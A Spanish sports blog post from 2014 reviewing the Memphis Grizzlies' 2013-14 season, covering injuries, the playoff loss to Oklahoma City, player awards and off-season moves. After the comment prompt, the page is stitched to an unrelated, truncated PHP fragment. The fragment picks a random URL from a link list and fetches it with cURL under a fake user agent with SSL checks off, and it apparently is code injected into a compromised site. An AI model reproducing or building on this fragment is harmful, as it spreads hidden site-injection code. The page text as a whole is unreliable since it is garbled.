Memphis Grizzlies: Bien

18 de August de 2014 por MagicJohnson32

grizzliesTras alcanzar el año anterior las finales de Conferencia en lo que supuso el mayor hito en la historia de la franquicia, nada estaba escrito de cara a la temporada 2013-2014, ni siquiera para el equipo más previsible de la liga. Porque si por algo resultan especialmente previsibles los Memphis Grizzlies es por una capacidad competitiva fuera de toda duda, algo que les permite encarar con entereza cualquier bache que les surja por el camino. No estaba escrito, por ejemplo, que perderían durante 23 partidos a Marc Gasol, eje sobre el que giran todos los engranajes de los Grizzlies defensiva y ofensivamente. El revés, al que se sumaría la lesión de Quincy Pondexter para toda la temporada, puso en serio riesgo el objetivo de los Playoffs en el ultra competitivo Oeste y condicionó absolutamente la campaña de los Grizzlies. Pese a todo, Memphis finalizó la regular season en la séptima posición y se quedó a un paso de derrotar a los Oklahoma City Thunder en una serie de primera ronda que resultó agónica para Durant y compañía. Más no se puede pedir a los Grizzlies.

¿O sí? ¿Hasta qué punto debe conformarse con una derrota en primera ronda un equipo que viene de alcanzar las finales de conferencia, por muy digna que fuese la eliminación a manos de OKC? Desde una perspectiva estrictamente deportiva, teniendo en cuenta las circunstancias, las lesiones y lo que supone competir en el Oeste, no queda más que reconocer un año más el mérito en lo conseguido por los Grizzlies, que por primera vez en la historia de la franquicia firman un balance positivo en cuatro campañas consecutivas. Sin embargo, repasando los movimientos realizados estos últimos años por la gerencia, los diferentes traspasos completados y decisiones tomadas, lo que queda es una sensación de conformismo: no se trata de llegar más lejos sino de mantener la posición gastando menos, una filosofía de la eficiencia en la que se encuadra la llegada a la franquicia del gurú de las estadísticas avanzadas John Hollinger. La marcha de Rudy Gay y la sustitución de Lionel Hollins por su asistente Dave Joerger revelan un conservadurismo que, en cierto modo, tiene más que ver con lo matemático que con lo deportivo.

Así que, una vez asumida la realidad de la franquicia, debemos valorar tanto la labor en los despachos como lo logrado en la pista. Los Grizzlies se presentaron la pasada campaña con pocas novedades en la plantilla, entre las que destacaban Mike Miller y Kostas Koufos. Ambos han cumplido moderadamente con lo que se requería de ellos: Miller aportó acierto desde más allá de la línea de 3 puntos y Koufos fue un recambio interior de garantías, especialmente durante el periodo de baja de Marc Gasol. La lesión de Pondexter llevó a los Grizzlies a traspasar a Jerryd Bayless a cambio de Courtney Lee, quien mejoró en Memphis el rendimiento que venía ofreciendo en Boston y se convirtió en el principal recurso ofensivo del equipo más allá del Big Three Conley-Randolph-Gasol. Otro jugador que tuvo un impacto positivo, al menos hasta que fue suspendido 20 partidos por dar positivo, fue el internacional griego Nick Calathes. El base superó claramente a Beno Udrih en las rotaciones de Joerger y promedió cerca de 15 puntos y 5 asistencias durante los siete partidos en los que sustituyó a Mike Conley, lo que le valió el premio al mejor rookie de febrero en la conferencia Oeste.

grit grind grizzliesComo se puede ver, ninguna de las incorporaciones tenía el potencial para cambiar las aspiraciones de los Grizzlies, aunque sí de corregir parcialmente las carencias que, pese al magnífico rendimiento ofrecido la temporada anterior, arrastraba la plantilla. De hecho, se podría alegar que la principal novedad fue el ya mencionado recambio en el banquillo, cuando un aparente enfrentamiento entre Lionel Hollins y John Hollinger resultó en la marcha del técnico. Joerger, hasta entonces asistente, tomó el relevo y con él a las riendas poco o nada cambió en el juego de los Grizzlies, que volvieron a desplegar su estilo característico, defensivo y lento pero de efectividad probada: el Grit ‘n Grind que Tony Allen representa mejor que nadie.

Así, con trabajo duro, aguantaron a duras penas (un balance de 10-13) durante la ausencia de Marc Gasol y de la misma manera completaron una segunda mitad de campaña a la altura de muy pocos para alcanzar las 50 victorias y asegurarse la séptima posición del Oeste y una nueva eliminatoria de Playoffs contra los Thunder. Las claves fueron las habituales, con Gasol prácticamente clavando números respecto a la campaña anterior (aunque sigue bajando sus porcentajes por su tendencia a alejarse del aro) y un mayor protagonismo ofensivo si cabe por parte de Conley y Zach Randolph. El base perdió algo de su mordiente defensiva pero asumió galones, lanzó a canasta más que nunca y su anotación se disparó hasta los 17 puntos de media. Por su parte, Randolph confirmó los indicios de recuperación que ya mostró el año pasado y, aunque no alcanzó los 20-12 de antes de la lesión, se ganó una extensión de contrato con promedios de 17-10.

princeLos Grizzlies llegan hasta donde les lleva su trío estelar, así que tampoco nos entretendremos demasiado analizando las aportaciones más o menos insustanciales de los jugadores de acompañamiento. En cualquier caso, más allá de los ya mencionados Allen, Lee, Koufos, Miller y Calathes, se puede destacar a James Johnson, notable en tramos de la regular season pero tan poco consistente como acostumbra y prácticamente desaparecido de la rotación una vez llegados los Playoffs. Destacados, aunque en negativo, hay que mencionar a Tayshaun Prince y a Ed Davis. Cuando Prince llegó el año pasado, parecía un jugador idóneo para el estilo de los Grizzlies; ahora no es más que el precio que la franquicia pagó por deshacerse del contrato de Rudy Gay. El ex de los Pistons, que se embolsará 7 millones esta próxima temporada, promedió 6 puntos y 3 rebotes y quedan lejos los días en los que era uno de los mejores defensores de la liga. Más decepcionante ha resultado el paso de Ed Davis por Memphis, adonde llegó desde Toronto con la etiqueta de prometedor 4-5 destinado a crecer a la sombra de Gasol y Randolph. Aunque sus números proyectados a 36 minutos siguen siendo buenos, su irregularidad y su pésima defensa le han apartado continuamente de las rotaciones, tanto que incluso Jon Leuer le ganó la partida y ejerció de primera rotación interior durante la lesión de Marc Gasol.

Una excelente segunda mitad de campaña aupó a los Grizzlies hasta las 50 victorias, la séptima plaza del Oeste y una primera ronda contra los Thunder durante la que, en muchos momentos, se comportaron como el equipo superior. Marc Gasol llegó en la mejor forma de todo el año, Randolph incrementó sus ya de por sí excelentes prestaciones y Conley hizo cuanto pudo ante Westbrook, pero el jugador que más cerca estuvo de cambiar el signo de la eliminatoria fue Tony Allen. Y no solo en defensa, donde llevó a Kevin Durant al borde del desquicio, sino también en ataque, con una contribución anotadora que no imaginábamos por su parte. Finalmente, después de siete agónicos partidos, Memphis capituló. Quedará para el gran libro de los “¿Y si…?” la duda de qué habría pasado de no haberse producido la sanción a Zach Randolph por golpear a Steven Adams. Como resultado, Z-Bo se perdió el séptimo encuentro, los Grizzlies se desmoronaron y los Thunder se apuntaron la victoria en la eliminatoria con la victoria más cómoda y la anotación más alta de toda la serie.

La derrota, sin duda dignísima y puede incluso que injusta, sirve para subrayar lo excepcional de lo logrado el año anterior y establecer un techo más razonable en las aspiraciones del equipo.

PREMIOS

okc marc gasolMVP: No fue una temporada sencilla para Marc Gasol el año después de lograr el premio como mejor defensor de la liga. Un esguince de ligamentos le costó 23 partidos en el tramo inicial de la regular season y le costó recuperar su mejor versión pero su progresión puso en evidencia su condición de MVP de los Grizzlies. En 2014, mejoró sus cifras de puntos, rebotes y asistencias cada mes, y en Playoffs  fue una pesadilla para los Thunder.

Rookie: Una de las mejores noticias que dejó la temporada para Memphis fue el papel de Nick Calathes, sobre todo cuando Mike Conley cayó lesionado y Joerger optó por el griego-americano como titular. No solo defendió el fuerte Calathes sino que llevó a los Grizzlies a un balance positivo (4-3) y se alzó con el premio al mejor novato del mes. Su campaña se vio empañada, sin embargo, con el positivo y la consiguiente sanción que le privó de disputar los Playoffs y le impedirá también jugar los primeros 13 encuentros de la temporada 14-15.

Sorpresa: Acostumbramos a definir a Mike Conley como “el base más infravalorado de la NBA”. Seguramente lo sea, y más después del espectacular incremento en su producción anotadora estas dos últimas temporadas. Reconozcámoslo: no veíamos a Conley en 2012 como un jugador capaz de promediar más de 17 puntos por encuentro.

Decepción: De rotunda decepción se puede calificar el año y medio que ha pasado Ed Davis en Memphis. Llegó a un equipo necesitado de una rotación interior de calidad y nunca ha logrado asentarse en un rol consistente, ni siquiera durante la lesión de Marc. Joerger optó con mucha frecuencia por James Johnson y Jon Leuer en detrimento de Davis, que solo ha sido titular cuatro partidos en toda la temporada y, cuando Zach Randolph fue sancionado para el séptimo partido de la serie contra los Thunder, no solo no salió en el quinteto inicial sino que apenas jugó un minuto.

Esfuerzo en vano: No es, ni de lejos, el mejor jugador de la plantilla. De hecho, ni siquiera es titular. Pero Tony Allen representa mejor que nadie el espíritu de estos Grizzlies que llevan hasta el extremo el concepto de equipo. Su entrega en la eliminatoria contra OKC fue un ejemplo de que es posible (extremadamente difícil pero posible) frenar hasta cierto punto a Kevin Durant.

JUGANDO A GM

No teníamos muchos frentes abiertos de cara a la off season y nuestra apuesta es, como de costumbre, por la continuidad. Lo principal era resolver la situación contractual de Zach Randolph, que disponía de una player option de 16,5 millones pero podía convertirse en agente libre. Tal vez nos habría resultado más conveniente firmarle un nuevo contrato a la baja que entrase en vigor de inmediato a razón de 10 millones anuales, aunque la solución acordada no es ni mucho menos mala: Randolph ejerce su opción de un año y 16,5 millones y se le extiende el contrato dos años más a diez millones por temporada. De esta manera, el verano que viene, cuando su salario se reduzca en más de seis millones y se extinga el contrato de 7 millones de Prince, podremos afrontar sin muchos agobios la renovación de Marc Gasol.

Entre los agentes libres de la plantilla que nos podía interesar renovar, y entre los que obviamente no está Ed Davis, uno seguirá (Udrih) y otro se marcha (Mike Miller). El base esloveno, muy discreto en regular season, dio un paso al frente en Playoffs, cuando la sanción a Calathes le sirvió para disponer de más minutos y ganarse la renovación por la biannual exception. Teniendo por delante un seguro de vida como Conley, parece suficiente tener una rotación con Udrih y Calathes.

vince carter grizzliesMás preocupante es la ausencia de un anotador en las alas, por lo que el asunto era prioritario. Nos habría gustado renovar a Mike Miller, pero cuando LeBron anunció su marcha a Cleveland se hizo evidente que Miller nos abandonaría. De todos modos, MM cumplía con su rol de triplista pero hacía falta algo más, especialmente cuando la alternativa en la posición de 3 es un Taysh Prince incapaz de meterla en una piscina. Tenemos que reconocer que estamos especialmente felices por habernos hecho con los servicios de Vince Carter, un lujazo para una franquicia como la nuestra, a la que llega con un contrato de 3 años y 12 millones. Creemos que su rol ideal sería el de sexto hombre, algo que le permitía no desgastarse en exceso y en el que ya brilló en Dallas. Sin embargo, nos tememos que será titular. No será un problema -más bien al contrario- mientras no le impida mantenerse sano.

También aprovechamos el draft para reforzar la posición de escolta con Jordan Adams, el anotador de los Bruins del que no esperamos un gran impacto de entrada pero que puede hacerse un hueco en las rotaciones de Joerger si mantiene la compostura en defensa.

En definitiva, tras varios calculados pasos atrás, la simple llegada de Vince Carter y la recuperación de Pondexter han de suponer una mejora sustancial y esperanzadora para nuestras aspiraciones, aunque de partida cabe recordar que en el Oeste la sola clasificación para Playoffs ya es todo un reto.

PG: Mike Conley, Nick Calathes, Beno Udrih
SG: Courtney Lee, Tony Allen, Jordan Adams
SF: Vince Carter, Quincy Pondexter,  Tayshaun Prince
PF: Zach Randolph, Jon Leuer
C: Marc Gasol, Kostas Koufos

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>